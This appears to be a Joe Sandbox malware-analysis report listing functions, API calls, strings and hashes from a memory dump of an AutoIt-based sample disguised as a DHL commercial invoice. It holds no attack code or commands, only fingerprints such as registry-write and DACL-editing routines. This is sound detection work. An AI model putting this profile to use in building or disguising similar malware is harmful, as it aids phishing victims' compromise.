Instruction ID: a8efb172f25bd8c009183bf88aad87ca1ecab0061ec82a99c5e5b78b00721fae
Opcode Fuzzy Hash: 793614968388035e742693e6ee4820ecaa89d491e218922b184e14207a6cf27c
Instruction Fuzzy Hash: 7BB14071A50215AFEB24DF78DC89FAE7BA9EB44710F004618FA15E7294DB74ED40CBA0

Function 012B4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 012B4AED
GetDriveTypeW.KERNEL32(?,012DCB68,?,\\.\,012DCC08), ref: 012B4BCA
SetErrorMode.KERNEL32(00000000,012DCB68,?,\\.\,012DCC08), ref: 012B4D36

Strings

FileBackedVirtual, xrefs: 012B4CEC
Network, xrefs: 012B4C02
SSA, xrefs: 012B4CA6
RAMDisk, xrefs: 012B4BF4
PhysicalDrive, xrefs: 012B4B76
iSCSI, xrefs: 012B4CC2
\\.\, xrefs: 012B4B3F
CDROM, xrefs: 012B4BFB
SCSI, xrefs: 012B4C8A
Virtual, xrefs: 012B4CE5
SATA, xrefs: 012B4CD0
Fibre, xrefs: 012B4CAD
SAS, xrefs: 012B4CC9
Unknown, xrefs: 012B4BED, 012B4C83
SSD, xrefs: 012B4C4A
Fixed, xrefs: 012B4C09
MMC, xrefs: 012B4CDE
Removable, xrefs: 012B4C10, 012B4C15
1394, xrefs: 012B4C9F
ATAPI, xrefs: 012B4C91
USB, xrefs: 012B4CB4
RAID, xrefs: 012B4CBB
ATA, xrefs: 012B4C98

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: f0d75cda4e73742744d528fd0ec8ee966e8e048810b84bba0eac1b3a97102ca2
Instruction ID: e183d968ecc4c63c095a0e1e11d89e30781864dd32dc8f5cb8a99d95983b927c
Opcode Fuzzy Hash: f0d75cda4e73742744d528fd0ec8ee966e8e048810b84bba0eac1b3a97102ca2
Instruction Fuzzy Hash: 3D61C1706301879BCB09FF28C9D29FD7BE0AB04B88B104519E907AB696DB71DD95CB41

Function 012D73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 012D7421
SetTextColor.GDI32(?,?), ref: 012D7425
GetSysColorBrush.USER32 ref: 012D743B
GetSysColor.USER32 ref: 012D7446
CreateSolidBrush.GDI32(?), ref: 012D744B
GetSysColor.USER32 ref: 012D7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 012D7471
SelectObject.GDI32(?,00000000), ref: 012D7482
SetBkColor.GDI32(?,00000000), ref: 012D748B
SelectObject.GDI32(?,?), ref: 012D7498
InflateRect.USER32 ref: 012D74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 012D74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 012D74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 012D752A
GetWindowTextW.USER32 ref: 012D7554
InflateRect.USER32 ref: 012D7572
DrawFocusRect.USER32 ref: 012D757D
GetSysColor.USER32 ref: 012D758E
SetTextColor.GDI32(?,00000000), ref: 012D7596
DrawTextW.USER32(?,012D70F5,000000FF,?,00000000), ref: 012D75A8
SelectObject.GDI32(?,?), ref: 012D75BF
DeleteObject.GDI32(?), ref: 012D75CA
SelectObject.GDI32(?,?), ref: 012D75D0
DeleteObject.GDI32(?), ref: 012D75D5
SetTextColor.GDI32(?,?), ref: 012D75DB
SetBkColor.GDI32(?,?), ref: 012D75E5

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: be8ad236c582fbc15f7ebaf801171610f039554616029b6d8cd0089ec2784f41
Instruction ID: 2b7c1b70e05bbf89ea98239f7d58bd95abfdd7bceb11fde2443ab7ebd5e49c66
Opcode Fuzzy Hash: be8ad236c582fbc15f7ebaf801171610f039554616029b6d8cd0089ec2784f41
Instruction Fuzzy Hash: 82617D72D01219AFDF119FA8EC49AAEBFB9EB08320F108115FA11BB295D7749950CF90

Function 012D0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 012D1128
GetDesktopWindow.USER32 ref: 012D113D
GetWindowRect.USER32(00000000), ref: 012D1144
GetWindowLongW.USER32(?,000000F0), ref: 012D1199
DestroyWindow.USER32 ref: 012D11B9
CreateWindowExW.USER32 ref: 012D11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 012D120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 012D121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 012D1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 012D1245
IsWindowVisible.USER32(00000000), ref: 012D12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 012D12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 012D12D0
GetWindowRect.USER32(00000000,?), ref: 012D12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 012D130E
GetMonitorInfoW.USER32(00000000,?), ref: 012D1328
CopyRect.USER32(?,?), ref: 012D133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 012D13AA

Strings

tooltips_class32, xrefs: 012D11E6
0, xrefs: 012D10D3
(, xrefs: 012D131B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 1003ecc1b9ee37439ae26b39b31da0b278a8a14ed2490dae6585d340a74b31c2
Instruction ID: 2a0349a4de4dbd91d454f3aaa2de9faa3408e8e9e996db30f0666b9ba3988e4b
Opcode Fuzzy Hash: 1003ecc1b9ee37439ae26b39b31da0b278a8a14ed2490dae6585d340a74b31c2
Instruction Fuzzy Hash: 56B18D71614342AFD714DF68D888B6ABBE4FF88750F00891CFA999B251CB71E854CB91

Function 012D0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 012D02E5
_wcslen.LIBCMT ref: 012D031F
_wcslen.LIBCMT ref: 012D0389
_wcslen.LIBCMT ref: 012D03F1
_wcslen.LIBCMT ref: 012D0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 012D04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 012D0504

Part of subcall function 0125F9F2: _wcslen.LIBCMT ref: 0125F9FD

Part of subcall function 012A223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 012A2258
Part of subcall function 012A223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 012A228A

Strings

SELECTALL, xrefs: 012D0515
FINDITEM, xrefs: 012D0627
ISSELECTED, xrefs: 012D04DD
DESELECT, xrefs: 012D059C
SELECTINVERT, xrefs: 012D057E
SELECT, xrefs: 012D0548
GETTEXT, xrefs: 012D03EC, 012D0407
GETITEMCOUNT, xrefs: 012D0316, 012D0337
GETSELECTEDCOUNT, xrefs: 012D0470, 012D048B
GETSELECTED, xrefs: 012D05E1
GETSUBITEMCOUNT, xrefs: 012D0384, 012D039F
SELECTCLEAR, xrefs: 012D052D
VIEWCHANGE, xrefs: 012D0675

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 046e198db04da6864c1f69ba5bab421974c183a93b23365362e276c6b51feb24
Instruction ID: aa083b329dec70854cdb5f2fcb1627f3ab79923b7406ca385f8bad65fea57216
Opcode Fuzzy Hash: 046e198db04da6864c1f69ba5bab421974c183a93b23365362e276c6b51feb24
Instruction Fuzzy Hash: FCE1BC312282028FCB19DF28C59083AB7E6FFD8718F54495CF9969B2A1DB30ED45CB95

Function 01258891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 01258968
GetSystemMetrics.USER32 ref: 01258970
SystemParametersInfoW.USER32 ref: 0125899B
GetSystemMetrics.USER32 ref: 012589A3
GetSystemMetrics.USER32 ref: 012589C8
SetRect.USER32 ref: 012589E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 012589F5
CreateWindowExW.USER32 ref: 01258A28
SetWindowLongW.USER32 ref: 01258A3C
GetClientRect.USER32 ref: 01258A5A
GetStockObject.GDI32(00000011), ref: 01258A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 01258A81

Part of subcall function 0125912D: GetCursorPos.USER32(?), ref: 01259141
Part of subcall function 0125912D: ScreenToClient.USER32(00000000,?), ref: 0125915E
Part of subcall function 0125912D: GetAsyncKeyState.USER32 ref: 01259183
Part of subcall function 0125912D: GetAsyncKeyState.USER32 ref: 0125919D

SetTimer.USER32(00000000,00000000,00000028,012590FC), ref: 01258AA8

Strings

AutoIt v3 GUI, xrefs: 01258A20

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 410adb7495df7bc40ffcf51f1990b270e02617f44abb67c0c8d0cb22e45e206a
Instruction ID: 3fecb02211a0e4cbe05f23952fbce8ae1f48dd7b457eee5b9a18f7b06f680c44
Opcode Fuzzy Hash: 410adb7495df7bc40ffcf51f1990b270e02617f44abb67c0c8d0cb22e45e206a
Instruction Fuzzy Hash: 8BB16B75A1020A9FDF64DFACD889BEE7BB5FB48314F004219FA15EB284DB74A851CB50

Function 012A0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 012A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 012A1114
Part of subcall function 012A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,012A0B9B,?,?,?), ref: 012A1120
Part of subcall function 012A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,012A0B9B,?,?,?), ref: 012A112F
Part of subcall function 012A10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,012A0B9B,?,?,?), ref: 012A1136
Part of subcall function 012A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 012A114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 012A0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 012A0E29
GetLengthSid.ADVAPI32(?), ref: 012A0E40
GetAce.ADVAPI32(?,00000000,?), ref: 012A0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 012A0E96
GetLengthSid.ADVAPI32(?), ref: 012A0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 012A0EB5
HeapAlloc.KERNEL32(00000000), ref: 012A0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 012A0EDD
CopySid.ADVAPI32(00000000), ref: 012A0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 012A0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 012A0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 012A0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 012A0F6E
HeapFree.KERNEL32(00000000), ref: 012A0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 012A0F7E
HeapFree.KERNEL32(00000000), ref: 012A0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 012A0F8E
HeapFree.KERNEL32(00000000), ref: 012A0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 012A0FA1
HeapFree.KERNEL32(00000000), ref: 012A0FA8

Part of subcall function 012A1193: GetProcessHeap.KERNEL32(00000008,012A0BB1,?,00000000,?,012A0BB1,?), ref: 012A11A1
Part of subcall function 012A1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,012A0BB1,?), ref: 012A11A8
Part of subcall function 012A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,012A0BB1,?), ref: 012A11B7

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 3846743e1a5f5c4c7d9aab5258bbe02eaf043a33ee1103112d0c1df1d2a583e5
Instruction ID: 0b253d045b16e1bf553e0ac21f0fca8880801dbf6c68e61ebaf6c5afb80e2c79
Opcode Fuzzy Hash: 3846743e1a5f5c4c7d9aab5258bbe02eaf043a33ee1103112d0c1df1d2a583e5
Instruction Fuzzy Hash: E071607191121AABEF209FA4EC48FAEBBBCBF05311F444129FA15F6180DB31A915CB60

Function 012CC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 012CC4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,012DCC08,00000000,?,00000000,?,?), ref: 012CC544
RegCloseKey.ADVAPI32(00000000), ref: 012CC5A4
_wcslen.LIBCMT ref: 012CC5F4
_wcslen.LIBCMT ref: 012CC66F
RegSetValueExW.ADVAPI32 ref: 012CC6B2
RegSetValueExW.ADVAPI32 ref: 012CC7C1
RegSetValueExW.ADVAPI32 ref: 012CC84D
RegCloseKey.ADVAPI32(?), ref: 012CC881
RegCloseKey.ADVAPI32(00000000), ref: 012CC88E
RegSetValueExW.ADVAPI32 ref: 012CC960

Strings

REG_QWORD, xrefs: 012CC8C3
REG_MULTI_SZ, xrefs: 012CC6F5
REG_BINARY, xrefs: 012CC913
REG_DWORD, xrefs: 012CC804
REG_SZ, xrefs: 012CC644
REG_EXPAND_SZ, xrefs: 012CC5CD

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 1f9a2d9b9afc571ac0ac239233e0a5807200b84004cfc6d4cb2ca9d92f235f5c
Instruction ID: 99858c0eccdca4c25ab871e7c782e7c42b0efa90e0ada6f1589abac65671ce67
Opcode Fuzzy Hash: 1f9a2d9b9afc571ac0ac239233e0a5807200b84004cfc6d4cb2ca9d92f235f5c
Instruction Fuzzy Hash: 31128E356142029FD719DF18D490A2ABBE5FF88B14F04895CEA9A9B3A1DB31FC41CB81

Function 012D091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 012D09C6
_wcslen.LIBCMT ref: 012D0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 012D0A54
_wcslen.LIBCMT ref: 012D0A8A
_wcslen.LIBCMT ref: 012D0B06
_wcslen.LIBCMT ref: 012D0B81

Part of subcall function 0125F9F2: _wcslen.LIBCMT ref: 0125F9FD

Part of subcall function 012A2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 012A2BFA

Strings

GETTOTALCOUNT, xrefs: 012D09F2, 012D0A17
EXISTS, xrefs: 012D0B7C, 012D0B97
GETSELECTED, xrefs: 012D0C4E
CHECK, xrefs: 012D0A85, 012D0AA0
ISCHECKED, xrefs: 012D0CE1
EXPAND, xrefs: 012D0BF8
GETTEXT, xrefs: 012D0C97
SELECT, xrefs: 012D0D11
COLLAPSE, xrefs: 012D0B01, 012D0B1C
GETITEMCOUNT, xrefs: 012D0C1E
UNCHECK, xrefs: 012D0D3E

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 54de2388db841db4a7430e9529c1ecd5fc4b3f38977a7b3eecda99e36b40d2cf
Instruction ID: 1a8c8137c78801047a4de3d4a171c354d5849eb449d778b54194dba33445b1e6
Opcode Fuzzy Hash: 54de2388db841db4a7430e9529c1ecd5fc4b3f38977a7b3eecda99e36b40d2cf
Instruction Fuzzy Hash: EBE1CC352287428FC715EF28C49092EB7E1FF98218F11894DF9969B3A1D731ED49CB86

Function 012CC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 012CC9B5
_wcslen.LIBCMT ref: 012CC9F1
_wcslen.LIBCMT ref: 012CCA68
_wcslen.LIBCMT ref: 012CCA9E
_wcslen.LIBCMT ref: 012CCAF9
_wcslen.LIBCMT ref: 012CCB2F
_wcslen.LIBCMT ref: 012CCB7F

Strings

HKEY_CURRENT_CONFIG, xrefs: 012CCB79, 012CCB7E
HKCC, xrefs: 012CCBAC
HKLM, xrefs: 012CCA98, 012CCA9D
HKEY_USERS, xrefs: 012CCBDF
HKCR, xrefs: 012CCB29, 012CCB2E
HKEY_CLASSES_ROOT, xrefs: 012CCAF3, 012CCAF8
HKEY_CURRENT_USER, xrefs: 012CCBBD
HKU, xrefs: 012CCBF0
HKEY_LOCAL_MACHINE, xrefs: 012CCA62, 012CCA67
HKCU, xrefs: 012CCBCE

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 716120a101416e8751be5f65aa6d88771b14d662fce68e8c8a15df8fb0554623
Instruction ID: 66ad399acb2b72225b1521321e359205c1be9c0b6a4416f1f7ad2cd23fb1f23c
Opcode Fuzzy Hash: 716120a101416e8751be5f65aa6d88771b14d662fce68e8c8a15df8fb0554623
Instruction Fuzzy Hash: AC710432A305678BCB21DE7CCD505BA33A5AF60D54B11071CEF9AA7285F631DDA5C3A0

Function 012D833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 012D835A
_wcslen.LIBCMT ref: 012D836E
_wcslen.LIBCMT ref: 012D8391
_wcslen.LIBCMT ref: 012D83B4
LoadImageW.USER32 ref: 012D83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,012D5BF2), ref: 012D844E
LoadImageW.USER32 ref: 012D8487
LoadImageW.USER32 ref: 012D84CA
LoadImageW.USER32 ref: 012D8501
FreeLibrary.KERNEL32(?), ref: 012D850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 012D851D
DestroyIcon.USER32(?,?,?,?,?,012D5BF2), ref: 012D852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 012D8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 012D8555

Strings

.exe, xrefs: 012D8388
.dll, xrefs: 012D83AB
.icl, xrefs: 012D8368

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 05598e67a3c0ad5ce07574dfd8ab9124e602d1c036e1ed60021ad147a3bb3f1f
Instruction ID: 9a17a67e0831317f32b80077651ab203c80144d8499e4b0a30c77547ec4465c2
Opcode Fuzzy Hash: 05598e67a3c0ad5ce07574dfd8ab9124e602d1c036e1ed60021ad147a3bb3f1f
Instruction Fuzzy Hash: A761E171920216BFEB25DF68DC85BBE77ACFB04711F104609FA15E61D0DBB4A990C7A0

Function 01247778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#OnAutoItStartRegister, xrefs: 01247817
#comments-end, xrefs: 012478D9
', xrefs: 01285169
#ce, xrefs: 012478ED
Bad directive syntax error, xrefs: 0128519A
Unterminated group of comments, xrefs: 0128528C
#notrayicon, xrefs: 012477E7
#cs, xrefs: 01247873, 012478C5
#requireadmin, xrefs: 012477FF
#include-once, xrefs: 0124782F
", xrefs: 01285153
Cannot parse #include, xrefs: 01285279
#comments-start, xrefs: 0124785F, 012478B1
#include, xrefs: 01247847
#pragma compile, xrefs: 012477D3

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 9666a96073dc9cf41bc0952fff0762a5d8c6f6b5b895eb14513b311b44adf97b
Instruction ID: 9cfc2f7ecf84fa15c5b66af5b358e03fa5965a7e343fc132d6c074bd65dc56d3
Opcode Fuzzy Hash: 9666a96073dc9cf41bc0952fff0762a5d8c6f6b5b895eb14513b311b44adf97b
